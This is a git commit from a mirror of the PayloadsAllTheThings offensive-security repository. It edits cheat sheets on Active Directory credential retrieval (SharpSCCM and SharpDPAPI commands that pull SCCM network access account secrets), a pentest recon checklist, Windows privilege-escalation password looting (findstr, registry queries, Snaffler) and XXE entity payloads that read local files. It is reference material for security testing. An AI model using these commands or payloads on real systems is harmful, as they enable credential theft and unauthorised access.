mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-04-25 14:55:09 +02:00
XXS Public Example + PHP Filter RCE
This commit is contained in:
parent
35ff178624
commit
fe41254fde
File diff suppressed because one or more lines are too long
|
@ -3663,9 +3663,10 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
|
|||
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
|
||||
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
|
||||
```
|
||||
* Using [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) for SCCM retrieval and decryption
|
||||
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
|
||||
```ps1
|
||||
.\SharpDPAPI.exe SCCM
|
||||
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
|
||||
```
|
||||
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
|
||||
```ps1
|
||||
|
@ -4048,4 +4049,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
|
||||
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
|
||||
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
|
||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
||||
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
|
||||
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
|
@ -41,6 +41,8 @@
|
|||
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
||||
```
|
||||
|
||||
* Perform Google Dorks search
|
||||
|
||||
|
||||
## Active recon
|
||||
|
||||
|
@ -74,7 +76,7 @@
|
|||
|
||||
### Web discovery
|
||||
|
||||
* Locate `robots.txt` file
|
||||
* Locate `robots.txt`, `security.txt`, `sitemap.xml` files
|
||||
* Retrieve comments in source code
|
||||
* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)
|
||||
* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
|
||||
|
@ -109,7 +111,10 @@
|
|||
|
||||
## Looking for Web vulnerabilities
|
||||
|
||||
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, ....
|
||||
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, Cookies, ....
|
||||
* Test for Business Logic weaknesses
|
||||
* High or negative numerical values
|
||||
* Try all the features and click all the buttons
|
||||
* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html
|
||||
|
||||
* Subscribe to the site and pay for the additional functionality to test
|
||||
|
|
|
@ -14,8 +14,8 @@
|
|||
* [Default Writeable Folders](#default-writeable-folders)
|
||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||
* [LAPS Settings](#laps-settings)
|
||||
* [HiveNightmare](#hivenightmare)
|
||||
* [LAPS Settings](#laps-settings)
|
||||
* [Search for file contents](#search-for-file-contents)
|
||||
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
||||
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
||||
|
@ -405,15 +405,6 @@ samdump2 SYSTEM SAM -o sam.txt
|
|||
|
||||
Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash.
|
||||
|
||||
### LAPS Settings
|
||||
|
||||
Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
|
||||
|
||||
* LAPS Enabled: AdmPwdEnabled
|
||||
* LAPS Admin Account Name: AdminAccountName
|
||||
* LAPS Password Complexity: PasswordComplexity
|
||||
* LAPS Password Length: PasswordLength
|
||||
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
|
||||
|
||||
### HiveNightmare
|
||||
|
||||
|
@ -443,6 +434,16 @@ mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\W
|
|||
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
|
||||
```
|
||||
|
||||
### LAPS Settings
|
||||
|
||||
Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
|
||||
|
||||
* LAPS Enabled: AdmPwdEnabled
|
||||
* LAPS Admin Account Name: AdminAccountName
|
||||
* LAPS Password Complexity: PasswordComplexity
|
||||
* LAPS Password Length: PasswordLength
|
||||
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
|
||||
|
||||
|
||||
### Search for file contents
|
||||
|
||||
|
@ -452,6 +453,10 @@ findstr /si password *.xml *.ini *.txt *.config
|
|||
findstr /spin "password" *.*
|
||||
```
|
||||
|
||||
Also search in remote places such as SMB Shares and SharePoint.
|
||||
* Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint)
|
||||
* Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler)
|
||||
|
||||
### Search for a file with a certain filename
|
||||
|
||||
```powershell
|
||||
|
@ -477,12 +482,6 @@ reg query HKLM /f password /t REG_SZ /s
|
|||
reg query HKCU /f password /t REG_SZ /s
|
||||
```
|
||||
|
||||
### Read a value of a certain sub key
|
||||
|
||||
```powershell
|
||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||
```
|
||||
|
||||
### Passwords in unattend.xml
|
||||
|
||||
Location of the unattend.xml files.
|
||||
|
|
|
@ -139,11 +139,9 @@ We try to display the content of the file `/etc/passwd`
|
|||
|
||||
:warning: `SYSTEM` and `PUBLIC` are almost synonym.
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
||||
```ps1
|
||||
<!ENTITY % xxe PUBLIC "Random Text" "URL">
|
||||
<!ENTITY xxe PUBLIC "Any TEXT" "URL">
|
||||
```
|
||||
|
||||
### Classic XXE Base64 encoded
|
||||
|
|
Loading…
Reference in New Issue